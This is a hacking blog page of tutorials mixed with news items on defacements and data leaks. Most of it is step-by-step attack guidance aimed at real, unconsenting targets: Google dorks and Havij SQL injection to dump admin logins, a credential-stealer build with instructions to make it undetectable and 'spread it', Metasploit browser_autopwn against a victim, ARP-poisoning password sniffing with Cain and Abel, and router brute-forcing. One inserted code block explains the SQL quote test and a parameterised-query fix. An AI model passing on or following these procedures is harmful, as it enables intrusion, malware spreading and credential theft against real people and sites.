
Hack Websites - Admin Login Using Havij


Hi friends, in this tutorial I will tell you how to hack websites with a SQL injection tool. There are a large number of SQL-vulnerable sites available.

Google dorks: Google dorks are specific queries that can reveal all the information about a specific website. I am giving you some Google dorks which you can use for finding websites vulnerable to SQL injection.


    addToCart.php?idProduct=
    addtomylist.php?ProdId=
    add-to-cart.php?ID=
    adminEditProductFields.php?intProdID=
    advSearch_h.php?idCategory=
    affiliate.php?ID=
    affiliate-agreement.cfm?storeid=
    affiliates.php?id=
    ancillary.php?ID=
    archive.php?id=
    article.php?id=
    phpx?PageID
    basket.php?id=
    Book.php?bookID=
    book_list.php?bookid=
    book_view.php?bookid=
    BookDetails.php?ID=

Finding target:
1) Now just paste any one of the queries into the Google search box and you will get a lot of websites.


2) Now open any of the websites and you will get a link like this.
    www.example.com/index.php?id=12 or any number

3) We just have to add a single quote (') at the end of the link, so it will become something like this.
    www.example.com/index.php?id=12'

4) Look closely at the page before adding the single quote (') and after adding it. If some element of the page is missing, then bingo! You have found a vulnerable website. Now we can start our SQL injection. If the page remains the same or shows an error like "page not found", then it is not vulnerable and you should move to another website.

Now we have our target ready, so what are you waiting for? Just attack.

1) First of all, download Havij 1.15.

Download Havij

2) Now extract it and run it. It will look something like this.

3) Now paste your target in the highlighted box and click Analyze.

4) Let it analyze your target for some time, and then you will see something like this.

5) Now click on the "Tables" tab. You will see something like this.

6) Now click on "Get DBs" (make sure you have tick-marked the first option, whatever it is). Now wait for about a minute and you will see something like this.

7) Now tick-mark both the options and click on "Get Tables". Wait for some 2-3 minutes. You will get a lot of information from this. It'll look something like this.

8) Now search for something sensitive like admin, users, login, passwords, and many more. Tick-mark them and click on "Get Columns". You will see something like this.

9) Now there you have user_id, password, user_name. Tick-mark them and select "Get Data". You will see something like this.

10) Now find the admin panel and log in using the user_id and password found.
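
Why the single-quote test in step 4 of "Finding target" changes the page, and the fix that makes it fail, as an added example that is not part of the original post. The `pages` table, the handler names and the sample rows are constructed for illustration, and SQLite stands in for the site's database.

```python
import html
import sqlite3

NOT_FOUND = "404 Not Found"
BROKEN = "<h1></h1>"  # page rendered with its database-driven element missing

def make_db():
    """Constructed sample data: a table like the one behind index.php?id=12."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(12, "Welcome"), (13, "Contact")])
    return conn

def render_vulnerable(conn, raw_id):
    """Pastes the URL parameter into the SQL text, so a quote changes the statement."""
    sql = "SELECT title FROM pages WHERE id = " + raw_id
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return BROKEN  # statement no longer parses; the element silently disappears
    return "<h1>%s</h1>" % html.escape(row[0]) if row else NOT_FOUND

def render_hardened(conn, raw_id):
    """Validates the id, then passes it as a bound parameter, never as SQL text."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return NOT_FOUND  # same response as for an id that does not exist
    row = conn.execute("SELECT title FROM pages WHERE id = ?",
                       (int(raw_id),)).fetchone()
    return "<h1>%s</h1>" % html.escape(row[0]) if row else NOT_FOUND

def quote_regression(render):
    """Responses of one handler for id=12 and id=12', for use in a regression test."""
    conn = make_db()
    return render(conn, "12"), render(conn, "12'")

if __name__ == "__main__":
    print("vulnerable:", quote_regression(render_vulnerable))
    print("hardened:  ", quote_regression(render_hardened))
```

A site owner can keep the second call as a permanent test: any handler that returns a broken page or a database error for `id=12'` is still building SQL from request text.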



Ethical Hacking


What is Ethical hacking?

Ethical hacking is the process of hacking information that is considered to be confidential. Information obtained through ethical hacking does not remain secret at all. The ethical hacking process is also known as intrusion testing, penetration testing or red teaming. Ethical hacking also gives a professional certification to the certified ethical hacker, where the hacking of a computer system or some other device takes place. This service has been made available to people by the International Council of E-Commerce Consultants.

Moreover, ethical hacking requires an ethical hacker, which is the name given to a person who is a penetration tester. The ethical hacker is responsible for performing different activities. His main role is to work for an organization, or to be hired by one, for the purpose of penetrating different networks or systems. The organization trusts the ethical hacker, as he is responsible for providing different services to the firm.

Ethical hacking is very similar to hacking, and the ethical hacker works in the same way as the hacker, for different purposes. The ethical hacker is a computer expert who is at the same time responsible for the working of the networking systems. He works on behalf of the members of the organization. At times the hacking service provided by the hacker can also be dangerous for the firm, since it can exploit the systems of the company.

BSNL website hacked by Anonymous

The hack was performed by the Anonymous India hacking group, which claims to have hacked the whole server, with 250 databases. The hackers wrote on the deface page that they deleted all the databases and dumped the credentials of BSNL database servers in a Pastebin file.

Yahoo Messenger loses important features starting from December 14th



This time Yahoo Messenger is turning to get a feature trim, and the company has announced on their blog that the once popular messaging service will lose some important features starting December 14th.

First of all Yahoo Messenger will lose interoperability with Microsoft’s Live Messenger. Users will still see their Live friends online but they will not be able to send them messages or interact in any way.

Chat Rooms as well as Voice calls to landlines are also getting cut.
And lastly and probably least important: Pingbox, an embeddable applet developed by Yahoo, will stop functioning after the 14th.

Anonymous Supporters defaced 500 websites

A hacker supporting the Anonymous group, with the nickname "PV~E.rr0r", hacked 516 websites. The deface page shows the Anonymous logo with the text "We unite as one but no one can divide us. Expect us!"

The hacker's intention was not to harm the websites, so he did not change or delete any file; he just uploaded his deface page on each site at "/Err0r.html".


Outlook.com has 25 million users


At the end of July, Microsoft launched the public beta of Outlook.com, its new online email service. Today, Microsoft announced that since the beta launch, there are now over 25 million active users on Outlook.com.

Three South African government websites hacked


A hacker named "H4ksniper" hacked three South African government websites. The website opened to a black page with a window containing the animated graphic “Website hacked by H4ksniper”.

Another message on the deface page was "Hello South Africa :D , Bad News For You IM BACK ! ..You Messed With Us & Now You Must Suffer..From Morocco with love."

Incapsula: DDoS Protection techniques

Incapsula is a cloud-based security service which can significantly enhance the security of your website, while also boosting its performance.
A Distributed Denial of Service (DDoS) attack is a DoS attack that is usually carried out by a “botnet”, a network of computers acting in concert to overwhelm the server by depleting all available resources.
The Incapsula DDoS Protection service uses both defense techniques, by integrating a global network of multi-gigabit scrubbing centers with a unique bot (automation) detection technology.
As a result, Incapsula provides complete protection from network (Layer 3 & 4) and application level (Layer 7) DDoS attacks.

Anonymous leaked personal information of 5000 Israeli officials

The hacker group “Anonymous” has declared cyberwar on Israel, posting personal data of five thousand Israeli officials online.
“The Israeli government has ignored repeated warnings about the abuse of human rights, shutting down the internet in Israel and mistreating its own citizens and those of its neighboring countries,” the hackers wrote in a statement.

The document contains names, email addresses and ID numbers apparently belonging to Israeli officials.

President of Sri Lanka website hacked

The official website of the President of Sri Lanka (president.gov.lk) has been hacked by a hacker named "Broken-Security" using a blind SQL injection vulnerability. The hack was also posted in a Pastebin note with a database dump including table and column names. The dump includes the username and encrypted password of the admin.

TUTORIAL ON STEALER TOTALLY EXPLAINED


What is a Stealer?
A stealer is basically used to steal the saved cookies in browsers. It only steals the saved passwords in browsers (e.g. IE, Chrome, Firefox) and any messengers.
Tools to use
• IS 6.0, 6.3
• ISR 0.4
These are the main tools used to steal the passwords.
We have seen many stealers like istealer 6.0 or something like that, but these tools are no longer in use because in the logs the username and password are the same. So we can use the upgraded version called ISR 0.4, which is the ultimate stealer to use. So use this tool to hack the password.

Here is the tutorial to use it.

What you need to use it:
1. Domain
2. Hosting
3. MySQL database
4. Tools, e.g. ISR 0.4

1. Domain
Purchase a domain; free domains are also available.
E.g. www.example.com

2. Hosting
Then you want hosting. Hosting is web space that is used to host your website with your domain name.

3. MySQL database
This is used to store website information like blog posts or user information. A MySQL database is the most popular type of relational database on the web today.

4. Tools
The tools are our main part to steal the cookies from victims.
So let's start.
First purchase a domain and hosting account, or they are available for free also.
I am doing this with a free domain and free hosting.
Here you go.

STEPS:

1. Go to http://000webhost.com
2. Sign up there with the free order.
3. After creating your hosting and domain, go to your cPanel.
After that, create a MySQL database.
1. Go to SQL Database.

2. Create a database and one database user account.

3. After creating the database, save this information.

• $dbHost = "fdb-1-5.cwahi.net"; // (1)MySQL host
• $dbUser = "username"; // (3)MySQL username
• $dbPass = "password"; // (4)MySQL password
• $dbDatabase = "username_db1"; // (2)MySQL database name

Then go back to cPanel. After that:
1. Go to the file manager.

2. Here you want to go into public_html.

3. Here you want to upload some files of our tool, which are in the PHP language.

We are using ISR 0.4,
so its files are:
• Config.php
• Install.php
• Index.php
• Style.css
So upload these files to your directory.
After that, go to your directory.
1. Click on config.php.
2. Click on Edit.

Then go to your domain name, e.g. www.example.com
1. Then type in the URL: http://www.example.com/install.php
2. Then click on INSTALL.
3. After installing, delete install.php from your hosting.
Here everything is done with hosting and domain.
1. Go to your tool, that is ISR0.4.exe.
2. Open it and paste your domain name link in the URL field.
E.g. http://www.example.com/index.php
3. Then click on Build Server.

4. After building the server, bind your file with anything and make a FUD.
5. Spread it... and enjoy it...
6. To show your logs, go to your domain, e.g. http://www.example.com/index.php
7. Log in there with your username and password.
If you want to download all the files which you use to create the stealer:

Download






ImageShack Server and Symantec Database hacked and Dumped



The ImageShack server has been hacked and all its files leaked online, and the portal of the antivirus company Symantec was also hacked and its database dumped in a Pastebin file.
Important files of the server, like /etc/passwd and /etc/shadow, have been leaked, along with a content list of the ImageShack web directory (/home/image/www), etc. The hacker claimed to have used a zero-day vulnerability.
In the Symantec case, the hackers leaked the complete database from the online portal. The database information includes phone numbers, email, domain, password, name, username, etc.


Anonymous leaks VMware ESX Server Kernel source code

"Stun", a member of the group “Anonymous”, leaked the VMware ESX Server Kernel source code via Twitter today. The tweet reads, "WILD LEAKY LEAK. FULL VMware ESX Server Kernel LEAKED." VMware ESX is an enterprise-level computer virtualization product offered by VMware.


A 1.89 MB file was uploaded as a torrent titled "VMware ESX Server Kernel LEAKED".

Tutorial On Windows 7 with Metasploit

Hack Windows 7 In 2 minutes
=====================

What You Need To Do And What You Want To Do?

1. Backtrack
2. Windows 7 machine
3. Installed browser, e.g. Chrome, IE, Firefox or any


So Let's Start
============
1. Start Backtrack.
2. Type "startx" to enter the GUI mode of Backtrack.
3. Go to the terminal.
4. Type "msfconsole".
5. Type msf:>use auxiliary/server/browser_autopwn

6. msf:>show options
Set LHOST, which means the localhost IP address. To check the localhost IP address, go to the terminal and type "ifconfig".
7. msf:>set LHOST e.g. 192.168.168.1
After that you want to set SRVPORT, which is 80 or 8080.
8. msf:>set SRVPORT 80
Then set URIPATH, e.g. root "/".
9. msf:>set URIPATH /
Now everything is done.
10. msf:>exploit or run
Now what you need to open on the victim machine:
Open any browser and type your Backtrack machine's IP address,
e.g. http://192.168.168.1/
After a minute you can see our session is open.

msf:>sessions -i 1
Enjoy......
If you have any problem, reply here.


Secunia launches Secunia Vulnerability Intelligence Manager 4.0


Secunia, the leading provider of IT security, today announced the new version of Secunia’s Vulnerability Intelligence Manager, the VIM 4.0.
The Secunia VIM 4.0 is the latest evolutionary step in the technology Secunia has developed to help organizations handle vulnerabilities and protect business critical information and assets against potential attacks. Because it covers more than 40,000 software systems and applications, the VIM 4.0 solution provides the most comprehensive intelligence about software vulnerabilities available to organizations, ensuring that all security threats can be dealt with before the IT infrastructure is compromised by cybercriminals.

Key benefits of the Secunia VIM include:
Reliable and accurate Vulnerability Intelligence at your fingertips
Personalised alerts via email and SMS
Comprehensive XML feeds
Comprehensive Vulnerability Management tool
Threat intelligence covering more than 40,000 systems and applications
What’s new in VIM 4.0:
New and improved user interface
Integration with the Secunia CSI
Improved assets matching
Improved data export
Activity log

SQL Injection - Attacks and Defenses


SQL Injection - How To Attack and How To Prevent

How To Sniff Passwords With Cain And Abel


Download Cain and Abel Here: http://www.oxid.it/downloads/ca_setup.exe

-> Run Cain and Abel as administrator
-> Go to the tab that says Sniffer
-> Go to the upper right corner under the Cain picture and enable the sniffer
-> Select your adapter (usually the one that has a listed IP address)
-> Click on the blue plus sign
-> Leave everything as is and press OK
-> Right-click on each of the IP addresses that come up
-> Resolve the host name for each one of them
-> Go to the bottom of the screen and hit the APR tab
-> Click on the top box
-> Click the blue plus sign
-> Find the computer you want to get passwords/information from in the left-hand box
-> Highlight everything that comes up in the right-hand box
-> Go to the upper right-hand corner, by the sniffer, and enable the APR poisoner
-> To find passwords, go to the bottom of the screen where it says Passwords
-> Here you will find all usernames and passwords of the person you have poisoned (most of the passwords will be in HTTP)








How to Hide your Computer in LAN/Local Area Network


When you want to hack any local network, like a wireless one, you want to be invisible
so no one can see your PC in that local network.

If your local network name is WORKGROUP, then skip step 1 and go to step 2.

1 - Go to: My Computer -> Properties -> Computer Name -> Change -> WORKGROUP = change to WORKGROUP,
then restart your PC.

2 - Go to Start -> Run -> cmd, then type on the command line:
net config server /hidden:yes

After that you will get a message from the system on the command line like this:

The command completed successfully.

This is the direct command:

C:\Documents and Settings\Imports.system>net config server /hidden:yes

The command completed successfully.

After a few minutes your computer will be invisible.
To confirm it, check your “My Network Places”:

My Network Places -> View workgroup computers.

If you want to be visible, change yes to no like this:
net config server /hidden:no

How To Rename Your Recycle Bin



1. Click Start / Run
2. Type regedit and press enter.
3. Open the HKEY_CLASSES_ROOT folder
4. Open the CLSID folder
5. Open the {645FF040-5081-101B-9F08-00AA002F954E} folder
6. Open the ShellFolder folder
7. Change the "Attributes" data value from "40 01 00 20" to "50 01 00 20". Once completed change the "CallForAttributes" dword value to "0x00000000" (doubleclick and change value data to 0). You must change both of these values to get the rename to appear.

After performing the above steps you will be able to rename the icon like any other icon.
Right-click the Recycle Bin icon on the desktop and click Rename and rename it to whatever you wish.



How To Crack A Router For Username and Password


(I will be using Brutus to crack a D-Link router.)

1. When we want to access our router, it will be password protected. We can try the default username and password.

As you can see, it is password protected.
2. I will open up my Brutus.


3. Configure Brutus. Put the target as the router's IP address. Put in the userlist and
the passlist. After everything is OK, press START.

As you can see from the picture above, Brutus is cracking the router.
4. Wait for Brutus to finish cracking the router. You will get this result.

You can see that I have got my username and password for the router.
5. Go to the page and type in the username and password.


Chat with Friends through MS-DOS Command Prompt



1) All you need is your friend's IP Address and your Command Prompt.
2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over to Command Prompt and press Enter.
You would then see something like this:

6) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

7) Now all you need to do is type your message and press Enter.

Start Chatting.......!